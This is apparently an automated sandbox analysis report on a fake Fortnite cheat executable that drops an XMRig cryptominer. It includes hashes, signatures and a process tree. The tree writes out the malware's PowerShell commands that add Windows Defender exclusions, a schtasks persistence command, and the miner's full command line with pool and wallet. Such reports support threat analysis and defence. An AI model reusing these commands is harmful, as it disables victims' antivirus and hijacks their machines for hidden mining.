Analysis
-
max time kernel
52s -
max time network
48s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
20-12-2024 01:50
Static task
static1
Behavioral task
behavioral1
Sample
FrotniteExternal.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
FrotniteExternal.exe
Resource
win10v2004-20241007-en
General
-
Target
FrotniteExternal.exe
-
Size
37KB
-
MD5
923d13d8499dd65d87611264a8e43002
-
SHA1
fcd2ede4ea47146687a642c8f60385e33edc5bb5
-
SHA256
d3a28b447201702f21bbf9f2bd7acf95962e613632f7b19be41f3636c74a1b72
-
SHA512
0b103b74f6368e7a46cf9371e534fd28339f1c04712e91de3f7f38ac81e4b9c0a3a5c79fe7e8411ce883038951c07cdee7b8944380e65e56d171e2103c2f4582
-
SSDEEP
768:whrLAIpwTDqbVLiqy64839q9Mq/oiE9aycHGj:oeqB2qy6x81O
Malware Config
Signatures
-
Xmrig family
-
XMRig Miner payload 7 IoCs
resource yara_rule behavioral2/memory/3204-117-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/3204-119-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/3204-132-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/3204-131-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/3204-135-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/3204-133-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/3204-134-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3676 powershell.exe 4740 powershell.exe 4060 powershell.exe 3640 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation FrotniteExternal.exe -
Executes dropped EXE 3 IoCs
pid Process 1196 cm2.exe 2496 services64.exe 3624 sihost64.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FortniteExternal = "C:\\Windows\\system32\\FortniteExternal.exe" FrotniteExternal.exe -
Drops file in System32 directory 6 IoCs
description ioc Process File created C:\Windows\system32\Microsoft\Libs\WR64.sys conhost.exe File created C:\Windows\system32\services64.exe conhost.exe File opened for modification C:\Windows\system32\services64.exe conhost.exe File created C:\Windows\system32\FortniteExternal.exe FrotniteExternal.exe File opened for modification C:\Windows\system32\FortniteExternal.exe FrotniteExternal.exe File created C:\Windows\system32\Microsoft\Libs\sihost64.exe conhost.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3972 set thread context of 3204 3972 conhost.exe 122 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ FrotniteExternal.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3492 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 17 IoCs
pid Process 1856 conhost.exe 3676 powershell.exe 3676 powershell.exe 4740 powershell.exe 4740 powershell.exe 3972 conhost.exe 3972 conhost.exe 4060 powershell.exe 4060 powershell.exe 3640 powershell.exe 3640 powershell.exe 3204 notepad.exe 3204 notepad.exe 3204 notepad.exe 3204 notepad.exe 3204 notepad.exe 3204 notepad.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 1856 conhost.exe Token: SeDebugPrivilege 3676 powershell.exe Token: SeDebugPrivilege 4740 powershell.exe Token: SeDebugPrivilege 3972 conhost.exe Token: SeDebugPrivilege 4060 powershell.exe Token: SeDebugPrivilege 3640 powershell.exe Token: SeLockMemoryPrivilege 3204 notepad.exe Token: SeLockMemoryPrivilege 3204 notepad.exe -
Suspicious use of WriteProcessMemory 47 IoCs
description pid Process procid_target PID 3252 wrote to memory of 1196 3252 FrotniteExternal.exe 84 PID 3252 wrote to memory of 1196 3252 FrotniteExternal.exe 84 PID 3252 wrote to memory of 3556 3252 FrotniteExternal.exe 88 PID 3252 wrote to memory of 3556 3252 FrotniteExternal.exe 88 PID 1196 wrote to memory of 1856 1196 cm2.exe 97 PID 1196 wrote to memory of 1856 1196 cm2.exe 97 PID 1196 wrote to memory of 1856 1196 cm2.exe 97 PID 1856 wrote to memory of 2636 1856 conhost.exe 98 PID 1856 wrote to memory of 2636 1856 conhost.exe 98 PID 2636 wrote to memory of 3676 2636 cmd.exe 100 PID 2636 wrote to memory of 3676 2636 cmd.exe 100 PID 1856 wrote to memory of 3976 1856 conhost.exe 101 PID 1856 wrote to memory of 3976 1856 conhost.exe 101 PID 3976 wrote to memory of 3492 3976 cmd.exe 103 PID 3976 wrote to memory of 3492 3976 cmd.exe 103 PID 2636 wrote to memory of 4740 2636 cmd.exe 104 PID 2636 wrote to memory of 4740 2636 cmd.exe 104 PID 1856 wrote to memory of 864 1856 conhost.exe 111 PID 1856 wrote to memory of 864 1856 conhost.exe 111 PID 864 wrote to memory of 2496 864 cmd.exe 113 PID 864 wrote to memory of 2496 864 cmd.exe 113 PID 2496 wrote to memory of 3972 2496 services64.exe 117 PID 2496 wrote to memory of 3972 2496 services64.exe 117 PID 2496 wrote to memory of 3972 2496 services64.exe 117 PID 3972 wrote to memory of 4752 3972 conhost.exe 118 PID 3972 wrote to memory of 4752 3972 conhost.exe 118 PID 4752 wrote to memory of 4060 4752 cmd.exe 120 PID 4752 wrote to memory of 4060 4752 cmd.exe 120 PID 3972 wrote to memory of 3624 3972 conhost.exe 121 PID 3972 wrote to memory of 3624 3972 conhost.exe 121 PID 4752 wrote to memory of 3640 4752 cmd.exe 123 PID 4752 wrote to memory of 3640 4752 cmd.exe 123 PID 3972 wrote to memory of 3204 3972 conhost.exe 122 PID 3972 wrote to memory of 3204 3972 conhost.exe 122 PID 3972 wrote to memory of 3204 3972 conhost.exe 122 PID 3972 wrote to memory of 3204 3972 conhost.exe 122 PID 3972 wrote to memory of 3204 3972 conhost.exe 122 PID 3972 wrote to memory of 3204 3972 conhost.exe 122 PID 3972 wrote to memory of 3204 3972 conhost.exe 122 PID 3972 wrote to memory of 3204 3972 conhost.exe 122 PID 3972 wrote to memory of 3204 3972 conhost.exe 122 PID 3972 wrote to memory of 3204 3972 conhost.exe 122 PID 3972 wrote to memory of 3204 3972 conhost.exe 122 PID 3972 wrote to memory of 3204 3972 conhost.exe 122 PID 3972 wrote to memory of 3204 3972 conhost.exe 122 PID 3972 wrote to memory of 3204 3972 conhost.exe 122 PID 3972 wrote to memory of 3204 3972 conhost.exe 122 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\FrotniteExternal.exe"C:\Users\Admin\AppData\Local\Temp\FrotniteExternal.exe"1⤵
- Checks computer location settings
- Adds Run key to start application
- Drops file in System32 directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3252 -
C:\Users\Admin\AppData\Local\Temp\cm2.exe"C:\Users\Admin\AppData\Local\Temp\cm2.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1196 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\cm2.exe"3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1856 -
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit4⤵
- Suspicious use of WriteProcessMemory
PID:2636 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4740
-
-
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:3976 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"5⤵
- Scheduled Task/Job: Scheduled Task
PID:3492
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Windows\system32\services64.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:864 -
C:\Windows\system32\services64.exeC:\Windows\system32\services64.exe5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2496 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"6⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3972 -
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit7⤵
- Suspicious use of WriteProcessMemory
PID:4752 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4060
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3640
-
-
-
C:\Windows\system32\Microsoft\Libs\sihost64.exe"C:\Windows\system32\Microsoft\Libs\sihost64.exe"7⤵
- Executes dropped EXE
PID:3624
-
-
C:\Windows\System32\notepad.exeC:\Windows/System32\notepad.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10343 --user=88SnrVgESxo4oqDueYzTEcYaJJR5sQpBAJwk5bMuskEg9jWfT5X5eYvhdPu8vWPBV1Tqbx31GitQURNLmvKkBtH5QsY6dN3 --pass= --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --tls --cinit-stealth7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3204
-
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:3556
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
539B
MD5b245679121623b152bea5562c173ba11
SHA147cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d
SHA25673d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f
SHA51275e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5d8cb3e9459807e35f02130fad3f9860d
SHA15af7f32cb8a30e850892b15e9164030a041f4bd6
SHA2562b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68
SHA512045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184
-
Filesize
944B
MD50226685f1147e3a1a4dcf62ad8a59da1
SHA1146afa36fd4e06472eaf86ceaa77bdf3ade1f41c
SHA25688c4b71603316658e178872b7e415a4b9023a0e0979661208946b97ba97ea4e6
SHA512c83051066fe1a24be60793afd4be5e88882beb9f3975a63a64040097b2a78f99c7f24e3a0ab864bdf1ea6a9e64e7ef86fa7c7dcb558db0ea34936dfcb429dc87
-
Filesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.1MB
MD5a954a23215467586a71022e732b23a8d
SHA1c089a6662e8f7bac5ec791b80ec81b77e20bdff4
SHA256007e711c06244bbbbf534b878d665ee0f17abbac80c7d4fb794f357684151751
SHA512e44f9f8aebebbb7a5559b67fe6824cc5637a8961aae2e929bdabfc0720b2b10ae70d7bcb9c132f1a3d6532848184bb3b9ec4f59a11d523dd215173df676860b9
-
Filesize
32KB
MD576dd3f5cec238575932dfbe21ff77b71
SHA1100b90b4c2880405683177513f5ef170257af160
SHA2561e5758dc2cf566629840cf437aadc72f4d5850bea3017f0751c30294989ea348
SHA5120c7d15ff6afe065fec4a20072f909663e2e048582ddfe34d15901cd7e16c4a8ac7911791191d01d5be496b6d1fb4b9492ecc8e271c28ffc263a2cdb4faa7e5d6